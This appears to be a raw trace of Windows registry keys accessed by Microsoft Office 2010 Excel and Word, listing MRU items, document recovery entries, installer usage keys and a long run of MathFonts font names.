HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35061
35061
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\351B8
351B8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35928
35928
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common
QMSessionCount
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\General
LastAutoSavePurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\351B8
351B8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
5 +
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
q +
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://z2.ink/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
9*,
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\30A0F
30A0F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
